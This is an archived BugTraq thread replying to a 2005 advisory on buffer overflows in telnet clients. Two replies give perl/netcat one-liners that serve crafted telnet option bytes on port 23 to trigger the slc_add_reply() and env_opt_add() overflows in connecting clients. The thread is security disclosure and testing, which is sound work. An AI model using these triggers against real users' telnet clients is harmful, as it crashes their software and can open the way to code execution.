BugTraq
iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability Mar 28 2005 06:09PM
iDEFENSE Labs (labs-no-reply idefense com) (1 replies)
Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability Mar 28 2005 09:35PM
Solar Designer (solar openwall com) (2 replies)
Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability Mar 29 2005 12:35AM
Gaël Delalleau gael.delalleau+moz (at) m4x (dot) org [email concealed] (gael delalleau+moz m4x org)
Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability Mar 29 2005 12:18AM
Tavis Ormandy (taviso gentoo org)
On Tue, Mar 29, 2005 at 01:35:02AM +0400, Solar Designer wrote:
> On Mon, Mar 28, 2005 at 01:09:38PM -0500, iDEFENSE Labs wrote:
> > Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability
>
> FWIW, I've been using the following one-liner to trigger this overflow:
>
> perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23
>

here's one for the env_opt_add() vulnerability:

perl -e 'print "\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23

--
-------------------------------------
taviso (at) sdf.lonestar (dot) org [email concealed] | finger me for my gpg key.
-------------------------------------------------------

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus